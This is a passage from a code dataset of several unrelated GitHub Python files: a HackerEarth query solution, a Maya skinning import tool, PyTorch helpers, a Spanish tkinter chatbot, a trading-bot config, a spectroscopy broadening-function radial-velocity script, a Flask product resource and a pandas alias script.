i in range(n):\n num = arr[i]\n count = int(math.sqrt(num)) + 1\n divisible = set()\n for j in range(1, count):\n if num % j == 0:\n divisible.add(j)\n divisible.add(num // j)\n for j in divisible:\n factors[j].append(i)\n \nfor _ in range(q):\n index, x = map(int, input().strip().split())\n index = index - 1\n factors_x = factors[x]\n ln = len(factors_x)\n if not ln:\n print(0)\n continue\n for i in range(ln):\n if factors_x[i] >= index:\n print(ln - i)\n break\n else:\n print(0)\n","repo_name":"Chiki1601/Hackerearth-Solutions","sub_path":"Algorithms/Searching/Binary search/Query multiples.py","file_name":"Query multiples.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"23576146298","text":"import os\n\nfrom Toonkit_Core.tkToolOptions.tkOptions import Options\nfrom tkMayaTools.tkMayaTool import MayaTool as Tool\n\nimport pymel.core as pc\nimport tkMayaCore as tkc\n\n__author__ = \"Cyril GIBAUD - Toonkit\"\n\nVERSIONINFO = \"1.0.0.0\"\n\nclass ImportSkinnings(Tool):\n def __init__(self, inContext=None, inDebug=False):\n super(ImportSkinnings, self).__init__(inName=\"Import skinnings\", inDescription=\"Import skinnings from a '.txt' file exported from 'Export skinnings', eventually using fusion modes\",\n inUsage=\"Select some meshes and run, and eventually joints to skip when using overwrite mode\", inVersion=VERSIONINFO, inContext=inContext, inDebug=inDebug, inOptions=None)\n\n self.options = Options(inPath=self.getOptionsPath())\n self.options.addOption(\"Overwrite\", False, \"When checked, will import skinning only on unnormalized areas and/or through influences that are not selected\", \"Overwrite\")\n self.options.addOption(\"Opacity\", 1.0, \"Blending with current envelope\", \"Opacity\")\n self.options.addOption(\"Normalize\", True, \"Normalize envelope\", \"Normalize\")\n self.options.addOption(\"MappingPath\", \"\", \"Mapping file path\", \"Mapping\")\n\n if not self.options.isSaved():\n self.saveOptions()\n\n def execute(self, *args, **kwargs):\n super(ImportSkinnings, self).execute(*args, **kwargs)\n\n sel = pc.selected()\n joints = pc.ls(sel, type=\"joint\")\n\n zeroInfs = None\n if len(joints) > 0:\n sel = [s for s in sel if s not in joints]\n zeroInfs = [n.stripNamespace() for n in joints]\n\n mode = 0\n if self.options[\"Opacity\"] < 1.0:\n mode = 3\n elif self.options[\"Overwrite\"]:\n mode = 1\n\n inPath = None\n inPath = pc.fileDialog2(caption=\"Load your envelopes\", fileFilter=\"Text file (*.txt)(*.txt)\", dialogStyle=1, fileMode=1)\n\n if inPath != None and len(inPath) > 0:\n inPath = inPath[0]\n\n mapping = None\n\n if not self.options[\"MappingPath\"] is None and os.path.isfile(self.options[\"MappingPath\"]):\n lines = []\n\n with open(self.options[\"MappingPath\"]) as f:\n lines = f.readlines()\n\n if len(lines) > 0:\n mapping = {}\n\n for line in lines:\n key, value = line.rstrip(\"\\r\\n\").split(\",\")[0:2]\n mapping[key] = value\n\n tkc.loadSkins(inPath, sel, inZeroInfs=zeroInfs, inMode=mode, inOpacity=self.options[\"Opacity\"], inNormalize=self.options[\"Normalize\"], inRemapDict=mapping)","repo_name":"CyrilToonkit/Toonkit_Module_Base","sub_path":"Maya/scripts/tkMayaTools/ImportSkinnings.py","file_name":"ImportSkinnings.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"73343501334","text":"import torch\n\ndef flat_params(m):\n flat_data = []\n for p in m.parameters():\n flat_data.append(p.data.view(-1))\n return torch.cat(flat_data)\n\ndef grad_norm(model):\n total_norm = 0\n for p in model.parameters():\n param_norm = p.grad.detach().data.norm(2)\n total_norm += param_norm.item() ** 2\n return total_norm.cpu() ** 0.5\n\ndef zero_gradients(x):\n if x.grad is not None:\n \tx.grad.zero_()\n\ndef get_lr(optimizer):\n for param_group in optimizer.param_groups:\n return param_group['lr']\n\ndef compute_jacobian(inputs, output):\n\t\"\"\"\n\t:param inputs: Batch X Size (e.g. Depth X Width X Height)\n\t:param output: Batch X Classes\n\t:return: jacobian: Batch X Classes X Size\n\t\"\"\"\n\tassert inputs.requires_grad\n\n\tnum_classes = output.size()[1]\n\n\tjacobian = torch.zeros(num_classes, *inputs.size())\n\tgrad_output = torch.zeros(*output.size())\n\tif inputs.is_cuda:\n\t\tgrad_output = grad_output.cuda()\n\t\tjacobian = jacobian.cuda()\n\n\tfor i in range(num_classes):\n\t\tzero_gradients(inputs)\n\t\tgrad_output.zero_()\n\t\tgrad_output[:, i] = 1\n\t\toutput.backward(grad_output, retain_variables=True)\n\t\tjacobian[i] = inputs.grad.data\n\n\treturn torch.transpose(jacobian, dim0=0, dim1=1) ","repo_name":"aorvieto/noise_injection_overparam","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"32335504459","text":"from tkinter import *\nroot = Tk()\nfrom chatterbot import ChatBot\nfrom chatterbot.trainers import ListTrainer\nimport pyttsx3\n\nplist = [ 'Hola',\n 'Hola me llamo Penélope Cruz. Mucho gusto.',\n '¿Cómo estás?',\n 'Estoy bien, gracias. ¿Y tú?',\n '¿Cómo eres?',\n 'Yo soy alta, bronceada, talentosa, y sociable.',\n '¿Cómo son tus primos?',\n 'Mis primos son trabajadores, inteligentes, rubios, y delgados.',\n '¿Cómo son tú y tu hermana?.',\n 'Mi hermana y yo tenemos pelo largo y somos jóvenes y artísticas.',\n '¿Qué te gusta hacer?',\n 'Me gusta cantar, correr, y bailar.',\n '¿Cuál es la fecha de tu cumpleaños?',\n 'Mi cumpleaños es el veintiocho de abril.',\n '¿Cuántos años tienes?',\n 'Yo tengo cuarenta y siete años.',\n '¿Cuál es tu color favorito?',\n 'Mi color favorito es rojo.',\n '¿De dónde eres?',\n 'Yo soy de Alcobendas, España.',\n '¿Qué comes en el desayuno?',\n 'Yo como huevos, pan tostado, tocino, y fresas.',\n '¿Qué bebes en el desayuno?',\n 'Yo bebo jugo de naranja y café.'\n ]\n\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[2].id)\n\nbot = ChatBot('El robot de Penélope Cruz')\nread_only=True\ntrainer = ListTrainer(bot)\n\ntrainer.train(plist)\n\ndef bot_reply():\n question= question_field.get()\n answer=bot.get_response(question)\n text_area.insert(END, \"Tú: \" + question+'\\n\\n')\n text_area.insert(END, \"Penélope Cruz: \" + str(answer) + '\\n\\n')\n pyttsx3.speak(answer)\n question_field.delete(0, END)\n\nroot.geometry('500x570')\nroot.title('El robot de Penelope Cruz')\nroot.config(bg=\"orange\")\n\nlogo_pic = PhotoImage(file=\"Penelope Cruz.png\")\nlogo_pic_label= Label(root,image=logo_pic, bg=\"orange\")\nlogo_pic_label.pack()\n\ncenter_frame = Frame(root)\ncenter_frame.pack()\n\nscroll_bar=Scrollbar(center_frame)\nscroll_bar.pack(side=RIGHT)\n\ntext_area=Text(center_frame, font=('times new roman', 20, 'bold'), height=10, yscrollcommand=scroll_bar.set\n , wrap='word')\n\ntext_area.pack(side=LEFT)\nscroll_bar.config(command=text_area.yview)\n\nquestion_field = Entry(root, font=('verdana', 20, 'bold'))\nquestion_field.pack(pady=15, fill=X)\n\nask_pic = PhotoImage(file=\"Enviar.png\")\n\nask_button = Button(root, image= ask_pic, command=bot_reply)\nask_button.pack()\n\nroot.mainloop()\n","repo_name":"ViggoMode2021/PenelopeCruzchatbot","sub_path":"PenelopeCruzchatbot.py","file_name":"PenelopeCruzchatbot.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74208658773","text":"import logging\nimport os\nimport sys\nimport random\n\nLOG_CONFIG = {\n 'name': 'ai-trading-bridge',\n 'level': logging.INFO,\n 'stream_handler': logging.StreamHandler(sys.stdout),\n 'format': '%(asctime)s: %(module)s: %(levelname)s: %(message)s'\n}\n\nPOLLING_CONFIG = {\n # 'yahoo_interval': 3000,\n 'yahoo_interval': 60*20,\n}\n\nALPACA_CONFIG = {\n 'key_id': os.environ.get('ALPACA_KEY_ID'),\n 'secret_key': os.environ.get('ALPACA_SECRET_KEY'),\n # Change to https://api.alpaca.markets for live\n 'base_url': 'https://paper-api.alpaca.markets'\n}\n\n\nTRADING_CONFIG = {\n 'DEBUG': True\n}\n\nDISCORD_WEBHOOK = os.environ.get(\"DISCORD_TRADING_WEBHOOK\")\n\nPORT = 8080","repo_name":"FriendlyUser/ai_trading_bot","sub_path":"ai_trading_bot/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"6194420713","text":"from __future__ import print_function\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\nfrom astropy.io import fits\nfrom astropy.time import Time\nfrom PyAstronomy import pyasl\nfrom scipy import ndimage\nimport pandas as pd\nimport gaussfitter as gf\nimport BF_functions as bff\n'''\nProgram to extract radial velocities from a double-lined binary star spectrum.\nUses the Broadening Function technique.\n\nMeredith Rawls\n2014-2015\n\nBased loosely on Rucinski's BFall_IDL.pro, and uses the PyAstronomy tools.\nhttp://www.astro.utoronto.ca/~rucinski/BFdescription.html\nhttp://www.hs.uni-hamburg.de/DE/Ins/Per/Czesla/PyA/PyA/pyaslDoc/aslDoc/svd.html\n\nIn practice, you will run this twice: once to do the initial BF, and then again\nto properly fit the peaks of each BF with a Gaussian.\n\nINPUT\ninfiles: single-column file with one FITS or TXT filename (w/ full path) per line\n 1st entry must be for the template star (e.g., arcturus or phoenix model)\n (the same template is used to find RVs for both stars)\n NO comments are allowed in this file\n FUN FACT: unless APOGEE, these should be continuum-normalized to 1 !!!\nbjdinfile: columns 0,1,2 must be filename, BJD, BCV (e.g., from IRAF bcvcorr)\n top row must be for the template star (e.g., arcturus)\n (the 0th column is never used, but typically looks like infiles_BF.txt)\n one line per observation\n comments are allowed in this file using #\ngausspars: your best initial guesses for fitting gaussians to the BF peaks\n the parameters are [amp1, offset1, width1, amp2, offset2, width2]\n the top line is ignored (template), but must have six values\n one line per observation\n comments are allowed in this file using #\n\nOUTPUT\noutfile: a file that will be created with 8 columns: BJD midpoint, orbital phase,\n Kepler BJD, RV1, RV1 error, RV2, RV2 error\nbfoutfile: a file that contains all the BF function data (raw RV, BF, gaussian model)\n\nIMMEDIATELY BELOW, IN THE CODE\nYou need to specify whether you have APOGEE (near-IR) or \"regular\" (e.g., ARCES)\nspectra with the 'isAPOGEE' flag. You also need to set the binary's PERIOD and BJD0,\nboth in days, and the constant RV and BCV of whatever template you are using.\n'''\n\n##########\n# YOU NEED TO HAVE THESE INPUT FILES !!!\n# THE OUTPUT FILE WILL BE CREATED FOR YOU\n\n# typical format for RG/EB systems\n#infiles = '../../RG_spectra/9291629/infiles_arcesBF.txt'\n#bjdinfile = '../../RG_spectra/9291629/bjdinfile_arcesBF.txt'\n#gausspars = '../../RG_spectra/9291629/gaussfit_arcesBF.txt'\n#outfile = '../../RG_spectra/9291629/rvoutfile_new_arcesBF.txt'\n\n# joni's EBs\n#infiles = '../../joni_EBs/OAinfits.txt'\n#bjdinfile = '../../joni_EBs/OAbjd.txt'\n#gausspars = '../../joni_EBs/OAgauss.txt'\n#outfile = '../../joni_EBs/OAmeredith_take2.txt'\n\n# (for KIC 8848288, ie TYC 3559)\ninfiles = '../../KIC_8848288/infiles.txt'\nbjdinfile = '../../KIC_8848288/bjdfile.txt'\ngausspars = '../../KIC_8848288/gaussfit.txt'\noutfile = '../../KIC_8848288/rvs_revisited3_BF.txt'\nbfoutfile = '../../KIC_8848288/bfoutfile3.txt'\n\n# (the original infiles)\n#infiles = '../../TelFit/9246715_telfit/infiles_BF_shift.txt'\n#bjdinfile = '../../RG_spectra/9246715/bjds_baryvels.txt'\n#gausspars = '../../RG_spectra/9246715/gaussfit_pars.txt'\n#outfile = '../../RG_spectra/9246715/redo_plot_BFoutput.txt'\n\n# STUFF YOU NEED TO DEFINE CORRECTLY !!!\nisAPOGEE = False # toggle to use near-IR stuff, or not\nSpecPlot = True # toggle to plot spectra before BFs, or not\nbjdoffset = 2454833. # difference between real BJDs and 'bjdfunny' (truncated BJDs)\namplimits = [0.8,1, 0.05,0.2] # limits for gaussian normalized amplitude [min1,max1,min2,max2]\nthreshold = 10 # margin for gaussian position (raw RV in km/s)\nwidlimits = [0,7, 0,40] # limits for gaussian width (km/s) [min1,max1,min2,max2]\n\n# ORBITAL PERIOD AND ZEROPOINT !!!\n#period = 171.277697; BJD0 = 2455170.514777 # 9246715\n#period = 207.1082; BJD0 = 2455112.7655 # 7037405\n#period = 63.327106; BJD0 = 2454976.635546 # 8430105\n#period = 120.3903; BJD0 = 2454957.682 # 10001167\n#period = 358.08; BJD0 = 2454962.684595 # 4663623\n#period = 20.686424; BJD0 = 2454966.8914 # 9291629\n#period = 19.38446; BJD0 = 2454970.2139 # 8702921\n#period = 33.65685; BJD0 = 2454960.8989 # 3955867\n#period = 235.300; BJD0 = 2455190.53 #9970396\n#period = 1058.23; BJD0 = 2454751.806288 #8054233\n#period = 197.9182; BJD0 = 2455162.6140 #5786154\nperiod = 5.56648; BJD0 = 2454904.8038 # (8848288)\n\n# joni's OA\n#period = 40.8778427; BJD0 = 2454955.556300\n\n# RADIAL VELOCITY AND BCV INFO FOR TEMPLATE (km/s; set both to 0 if using a model !!!)\n#rvstd = -64.422; bcvstd = 10.747 # HD168009 (fullspec26), G1 V star\n#rvstd = -21.619; bcvstd = 16.571 # HD182488 (fullspec28), G9 V star\n#rvstd = -21.123; bcvstd = 12.499 # HD196850 (fullspec32), G1 V star\nrvstd = 0; bcvstd = 0 # model template\n#rvstd = 0; bcvstd = 13.5073 # joni's OA with self-template\n\n# PARAMETERS FOR THE BROADENING FUNCTION (IMPORTANT PAY ATTENTION !!!)\nsmoothstd = 1.0 #1.5 # stdev of Gaussian to smooth BFs by (~slit width in pixels)\n#w00 = 5400 # starting wavelength for new grid\n#n = 38750 # number of wavelength points for new grid\n#stepV = 1.7 # roughly 3e5 / (max_wavelength / wavelength_step) km/s, rounded down\nm = 171 # length of the BF (must be longer if RVs are far from 0)\n## good values for APOGEE:\n#w00 = 15145; n = 15000; stepV = 1.5\n#w00 = 15670; n = 2000; stepV = 1.5\n## good values for ARCES & TRES together:\n#w00 = 5400; n = 38750; stepV = 1.7\n## good values for 8848288 (HET low & high res):\n#w00 = 4408; n = 55000; stepV = 1.5\n#w00 = 4485; n = 53000; stepV = 1.5\nw00 = 4485; n = 80000; stepV = 1.5 # testing larger, redder wavelength range\n\n# STUFF TO MAKE PLOTS LOOK NICE\n#rvneg = -69; rvpos = 69; ymin = -0.05; ymax = 0.45 # 9246715\n#rvneg = -89; rvpos = 39; ymin = -0.05; ymax = 0.30 # 7037405\n#rvneg = -69; rvpos = 69; ymin = -0.05; ymax = 0.35 # 8430105\n#rvneg = -170; rvpos = 5; ymin = -0.05; ymax = 0.15 # 10001167\n#rvneg = -69; rvpos = 69; ymin = -0.05; ymax = 0.45 # 4663623\n#rvneg = -109; rvpos = 79; ymin = -0.05; ymax = 0.45 # 9291629\n#rvneg = -95; rvpos = 130; ymin = -0.05; ymax = 0.20 # 8702921\n#rvneg = -99; rvpos = 99; ymin = -0.05; ymax = 0.30 # 3955867\n#rvneg = -69; rvpos = 49; ymin = -0.05; ymax = 0.30 # 9970396\n#rvneg = -70; rvpos = 70; ymin = -0.05; ymax = 0.20 # 8054233\n#rvneg = -59; rvpos = 59; ymin = -0.05; ymax = 0.30 # 5786154\nrvneg = -64; rvpos = 24; ymin = -0.05; ymax = 1.05 #ymin = -0.15; ymax = 0.50 # (8848288)\n\n#rvneg = -49; rvpos = 99; ymin = -0.15; ymax = 0.6 # test for joni OA\n\n# some previously set values for posterity ...\n# ARCES ARCTURUS OBSERVATION\n#rvstd = 20.71053 # this is the TOTAL RV OFFSET FROM REST of the ARCES Arcturus observation\n#bcvstd = 0 # this goes with the above rvstd\n#rvstd = -5.19 # from SIMBAD, for Arcturus ... WRONG(ish)\n#bcvstd = -0.155355148339 # APOGEE Arcturus bcv\n#bcvstd = 18.4574 # ARCES Arcturus bcv\n##########\n\nprint('Welcome to the Broadening Function party!')\nprint('')\nprint('MAKE SURE THIS IS WHAT YOU WANT:')\nprint('You set Porb = {0} days, BJD0 = {1} days'.format(period, BJD0))\n\n# CREATE NEW SPECTRUM IN LOG SPACE\n# This uses w00, n, and stepV, defined above. The new wavelength grid is w1.\n# The BF will be evenly spaced in velocity with length m.\n# The velocity steps are r (km/s/pix).\nw1, m, r = bff.logify_spec(isAPOGEE, w00, n, stepV, m)\n\n# READ IN ALL THE THINGS\nspecdata = bff.read_specfiles(infiles, bjdinfile, isAPOGEE)\nnspec = specdata[0]; filenamelist = specdata[1]\ndatetimelist = specdata[2]; wavelist = specdata[3]; speclist = specdata[4]\n\n# INTERPOLATE THE TEMPLATE AND OBJECT SPECTRA ONTO THE NEW LOG-WAVELENGTH GRID\n# OPTION TO PLOT THIS (commented out for now)\n##plt.figure(1)\nnewspeclist = []\nyoffset = 1\nif SpecPlot == True:\n plt.axis([w1[0], w1[-1], 0, nspec+3])\n plt.xlabel(r'Wavelength ({\\AA})')\nfor i in range (0, nspec):\n newspec = np.interp(w1, wavelist[i], speclist[i])\n newspeclist.append(newspec)\n if SpecPlot == True:\n plt.plot(w1, newspec+yoffset, label=datetimelist[i].iso[0:10], color='b')\n yoffset = yoffset + 1\nif SpecPlot == True:\n ##plt.legend()\n plt.show()\n\n# BROADENING FUNCTION TIME\nsvd = pyasl.SVD()\n# Single Value Decomposition\nsvd.decompose(newspeclist[0], m)\nsingularvals = svd.getSingularValues()\nbflist = []\nbfsmoothlist = []\nfor i in range (0, nspec):\n # Obtain the broadening function\n bf = svd.getBroadeningFunction(newspeclist[i]) # this is a full matrix\n bfarray = svd.getBroadeningFunction(newspeclist[i], asarray=True)\n # Smooth the array-like broadening function\n # 1ST LINE - python 2.7 with old version of pandas; 2ND LINE - python 3.5 with new version of pandas\n #bfsmooth = pd.rolling_window(bfarray, window=5, win_type='gaussian', std=smoothstd, center=True)\n bfsmooth = pd.Series(bfarray).rolling(window=5, win_type='gaussian', center=True).mean(std=smoothstd)\n # The rolling window makes nans at the start because it's a punk.\n for j in range(0,len(bfsmooth)):\n if np.isnan(bfsmooth[j]) == True:\n bfsmooth[j] = 0\n else:\n bfsmooth[j] = bfsmooth[j]\n bflist.append(bf)\n bfsmoothlist.append(bfsmooth)\n \nbfnormlist = []\nfor a in bfsmoothlist:\n bfnormlist.append((a-np.min(a))/(np.max(a)-np.min(a)))\n\n# Obtain the indices in RV space that correspond to the BF\nbf_ind = svd.getRVAxis(r, 1) + rvstd - bcvstd\n\n# OPTION TO PLOT THE SINGULAR VALUES TO SEE WHERE THEY AREN'T A MESS\n# this probably isn't important, because instead of choosing which values to throw out,\n# we use \"Route #2\" as described by Rucinski and just use the final row of the BF array\n# and smooth it with a Gaussian to get rid of noise problems.\n# for more info, seriously, read http://www.astro.utoronto.ca/~rucinski/SVDcookbook.html\n##plt.figure(2)\n#plt.semilogy(singularvals, 'b-')\n#plt.xlabel('BF Index')\n#plt.ylabel('Singular Values')\n#plt.show()\n\n# OPTION TO PLOT THE SMOOTHED BFs\n##plt.figure(3)\nplt.axis([rvneg, rvpos, -0.2, float(nspec)/2.5])\nplt.xlabel('Radial Velocity (km s$^{-1}$)')\nplt.ylabel('Broadening Function (arbitrary amplitude)')\nyoffset = 0.0\nfor i in range(1, nspec):\n plt.plot(bf_ind, bfsmoothlist[i]+yoffset, color='b')\n yoffset = yoffset + 0.4\nplt.show()\n\n# FIT THE SMOOTHED BF PEAKS WITH TWO GAUSSIANS\n# you have to have pretty decent guesses in the gausspars file for this to work.\n#bffitlist = bff.gaussparty(gausspars, nspec, filenamelist, bfsmoothlist, bf_ind, threshold)\nbffitlist = bff.gaussparty(gausspars, nspec, filenamelist, bfnormlist, bf_ind, amplimits, threshold, widlimits)\nrvraw1 = []; rvraw2 = []; rvraw1_err = []; rvraw2_err = []\nrvraw1.append(0), rvraw2.append(0), rvraw1_err.append(0), rvraw2_err.append(0)\nfor i in range(1, len(bffitlist)):\n rvraw1.append(bffitlist[i][0][1]) # [0,1,2] is amp,rv,width for star 1; [4,5,6] is same for star2\n rvraw2.append(bffitlist[i][0][4])\n rvraw1_err.append(bffitlist[i][2][1])\n rvraw2_err.append(bffitlist[i][2][4])\n\n# CALCULATE ORBITAL PHASES AND FINAL RV CURVE\nrvdata = bff.rvphasecalc(bjdinfile, bjdoffset, nspec, period, BJD0, rvraw1, rvraw1_err, rvraw2, rvraw2_err, rvstd, bcvstd)\nphase = rvdata[0]; bjdfunny = rvdata[1]\nrv1 = rvdata[2]; rv2 = rvdata[3]\nrv1_err = rvdata[4]; rv2_err = rvdata[5]\ng2 = open(outfile, 'w')\nprint('# RVs calculated with BF_python.py', file=g2)\nprint('#', file=g2)\nprint('# Porb = {0} days, BJD0 = {1} days'.format(period, BJD0), file=g2)\nprint('# Wavelength axis = [{0} - {1}] Angstroms'.format(w1[0], w1[-1]), file=g2)\nprint('#', file=g2)\nprint('# Template spectrum (line 0 of infiles): {0}'.format(filenamelist[0]), file=g2)\nprint('# RV of template, BCV of template (km/s): {0}, {1}'.format(rvstd, bcvstd), file=g2)\nprint('#', file=g2)\nprint('# List of all input spectra (infiles): {0}'.format(infiles), file=g2)\nprint('# Target BJD and BCV info (bjdinfile): {0}'.format(bjdinfile), file=g2)\nprint('# Gaussian fit guesses (gausspars): {0}'.format(gausspars), file=g2)\nprint('#', file=g2)\nprint('# BF parameters: w00 = {0}; n = {1}; stepV = {2}'.format(w00, n, stepV), file=g2)\nprint('# BF parameters: smoothstd = {0}; m = {1}'.format(smoothstd, m), file=g2)\nprint('# gaussfit: amplimits = {0}; threshold = {1}, widlimits = {2}'.format(amplimits, threshold, widlimits), file=g2)\nprint('#', file=g2)\nprint('# time, phase, adjusted_time, RV1 [km/s], error1 [km/s], RV2 [km/s], error2 [km/s]', file=g2)\nprint('#', file=g2)\nfor i in range(1, nspec):\n print ('%.9f %.9f %.9f %.5f %.5f %.5f %.5f' % (bjdfunny[i] + bjdoffset, phase[i], bjdfunny[i], \n rv1[i], rv1_err[i], rv2[i], rv2_err[i]), file=g2)\ng2.close()\nprint('BJD, phase, and RVs written to %s.' % outfile)\nprint('Use rvplotmaker.py to plot the RV curve.')\n\ntry:\n bfout = open(bfoutfile, 'w')\n for idx in range(1, nspec):\n print('###', file=bfout)\n print('# timestamp: {0}'.format(datetimelist[idx]), file=bfout)\n print('# Gaussian 1 [amp, RV +/- err, wid]: [{0:.2f}, {1:.2f} +/- {2:.2f}, {3:.2f}]'.format(bffitlist[i][0][0], rvraw1[i], rvraw1_err[i], bffitlist[i][0][2]), file=bfout)\n print('# Gaussian 2 [amp, RV +/- err, wid]: [{0:.2f}, {1:.2f} +/- {2:.2f}, {3:.2f}]'.format(bffitlist[i][0][3], rvraw2[i], rvraw2_err[i], bffitlist[i][0][5]), file=bfout)\n print('# Uncorrected_RV, BF_amp, Gaussian_fit', file=bfout)\n print('###', file=bfout)\n for vel, amp, modamp in zip(bf_ind, bfsmoothlist[idx], bffitlist[idx][1]):\n print(vel, amp, modamp, file=bfout)\n bfout.close()\nexcept:\n print('No BF outfile specified, not saving BF data to file')\n \n# handy little gaussian function maker\ndef gaussian(x, amp, mu, sig): # i.e., (xarray, amp, rv, width)\n return amp * np.exp(-np.power(x - mu, 2.) / (2 * np.power(sig, 2.)))\n\n# PLOT THE FINAL SMOOTHED BFS + GAUSSIAN FITS IN INDIVIDUAL PANELS\n# manually adjust this multi-panel plot based on how many spectra you have\n#plt.figure(4)\nwindowcols = 4 # how many window columns there should be\n#windowrows = 6\nwindowrows = int([np.rint((nspec-1)/windowcols) if (np.float(nspec-1)/windowcols)%windowcols == 0 else np.rint((nspec-1)/windowcols)+1][0])\nxmin = rvneg\nxmax = rvpos\n#gaussxs = np.arange(-200, 200, 0.1)\nfig = plt.figure(1, figsize=(15,10))\nfig.text(0.5, 0.04, 'Uncorrected Radial Velocity (km s$^{-1}$)', ha='center', va='center', size=26)\nfig.text(0.07, 0.5, 'Broadening Function', ha='center', va='center', size=26, rotation='vertical')\nfor i in range (1,nspec):\n ax = fig.add_subplot(windowrows, windowcols,i) # out of range if windowcols x windowrows < nspec\n ax.yaxis.set_major_locator(MultipleLocator(0.2))\n if i!=1 and i!=5 and i!=9 and i!=13 and i!=17 and i!=21 and i!=25:\n ax.set_yticklabels(())\n #if i!=20 and i!=21 and i!=22 and i!=23 and i!=24 and i!=25:\n if i < nspec-windowrows:\n #if i!=13 and i!=14 and i!=15 and i!=16:\n ax.set_xticklabels(())\n plt.subplots_adjust(wspace=0, hspace=0)\n plt.axis([xmin, xmax, ymin, ymax])\n plt.tick_params(axis='both', which='major', labelsize=14)\n plt.text(xmax - 0.25*(np.abs(xmax-xmin)), 0.8*ymax, '%.3f $\\phi$' % (phase[i]), size=12)\n plt.text(xmax - 0.35*(np.abs(xmax-xmin)), 0.6*ymax, '%s' % (datetimelist[i].iso[0:10]), size=12)\n #plt.plot(bf_ind, bfsmoothlist[i], color='k', lw=1.5, ls='-', label='Smoothed BF')\n plt.plot(bf_ind, bfnormlist[i], color='k', lw=1.5, ls='-', label='Normalized Smoothed BF')\n plt.plot(bf_ind, bffitlist[i][1], color='b', lw=2, ls='--', label='Two Gaussian fit')\n gauss1 = gaussian(bf_ind, bffitlist[i][0][0], bffitlist[i][0][1], bffitlist[i][0][2])\n gauss2 = gaussian(bf_ind, bffitlist[i][0][3], bffitlist[i][0][4], bffitlist[i][0][5])\n plt.plot(bf_ind, gauss1, color='#e34a33', lw=2, ls='--')#, label='Gaussian fit 1')\n plt.plot(bf_ind, gauss2, color='#fdbb84', lw=2, ls='--')#, label='Gaussian fit 2')\n # OPTION TO PLOT VERTICAL LINE AT ZERO\n plt.axvline(x=0, color='0.75') \n # print legend\n if i==nspec-1: ax.legend(bbox_to_anchor=(2.6,0.7), loc=1, borderaxespad=0., \n frameon=False, handlelength=3, prop={'size':20})\nplt.show()","repo_name":"mrawls/BF-rvplotter","sub_path":"BF_python.py","file_name":"BF_python.py","file_ext":"py","file_size_in_byte":16344,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"37236321237","text":"# -*- coding: utf-8 -*-\n#python\nlista=[] # inicia variavel lista\nlista.append(2) # put 2\nlista.append(7) # put 7\nlista.append(3) # put 3 \nfirst = lista[0] # first = 2 { get first element }\nlast = lista[-1] # last = 3 {get last element }\nlista.append(8) # put 8\ntres = lista[2] # tres = 3 {get 3}\ndois = lista[1] # dois = 7 {get 2}\nprint(lista) # [2, 7, 3, 8]\nlista.pop(2) # remove 3º element\nprint(lista) # [2, 7, 8]\n\n#test\nprint(first,last,dois,tres) # 2 3 7 3\n\nlista = [] # clear\n\n# Nota\n# Caso queira remover o elemento \"2\" use o comando\n# lista.remove(2)\n# no caso do exercicio do desafio talvez eu tenha confundido a posicao do elemento com o elemento\n# entao a linha 12 ficaria assim\n# lista.remove(3) \n# e a lista final seria => lista = [2, 7, 8]\n\nexit() # exit\n\n","repo_name":"Marcdnd/Kryptus-desafio-python","sub_path":"desafio-1.py","file_name":"desafio-1.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16282724946","text":"from flaskApp.models.Proizvod import ProizvodModel\nfrom flaskApp.models.Korisnik import KorisnikModel\nfrom flaskApp.models.TipProizvoda import TipProizvodaModel\nfrom flaskApp.resource.Upotreba import Upotereba\nclass Proizvod:\n\n @classmethod\n def vratiProizvodeZaFirmu(cls,naziv):\n id=KorisnikModel.find_firma(naziv).id\n lista=[]\n for i in ProizvodModel.find_all_with_id(id):\n lista.append(i.json())\n return lista\n\n @classmethod\n def dodajProizvod(cls,data):\n if ProizvodModel.find_one(data['naziv'],data['korisnikID'],data['kolicina']):\n return {'Poruka':'Uneti proizvod vec postoji!'}\n else:\n if TipProizvodaModel.find_one(data['tipID']):\n if KorisnikModel.find_one_id(data['korisnikID']):\n proizvod=ProizvodModel(data['cena'],data['naziv'],data['organsko'],data['korisnikID'],data['tipID'],data['kolicina'])\n proizvod.add()\n for i in data['sastojci']:\n Upotereba.poveziSastojkeSaProizvodima(ProizvodModel.find_one(data['naziv'],data['korisnikID'],data['kolicina']).id,i['id'])\n return {'Poruka':'Uspesno je unet proizvod {0}'.format(data['naziv'])}\n else:\n return {'Greska':'Uneseni proizvod nije od korektnog korisnika!'} \n else:\n return {'Greska':'Uneseni proizvod nije korektnog tipa!'}\n \n \n @classmethod\n def uradiFilter(cls,vrednost):\n result=[]\n proizvodi=ProizvodModel.find_all()\n for i in proizvodi:\n if vrednost.lower() in i.naziv.lower():\n result.append(i)\n return result \n\n\n","repo_name":"NeskovicStefan2402/Epijaca","sub_path":"Envs/projekat1VENV/platformaBackend/flaskApp/resource/Proizvod.py","file_name":"Proizvod.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30884443139","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 11 13:01:15 2019\n@author: eneemann\nScript to move multiple alias rows with the same joining ID into multiple columns on the same row\n\n\"\"\"\n\nimport os\nimport time\nimport pandas as pd\nimport numpy as np\n\n\n# Start timer and print start time in UTC\nstart_time = time.time()\nreadable_start = time.strftime(\"%Y-%m-%d %H:%M:%S\", 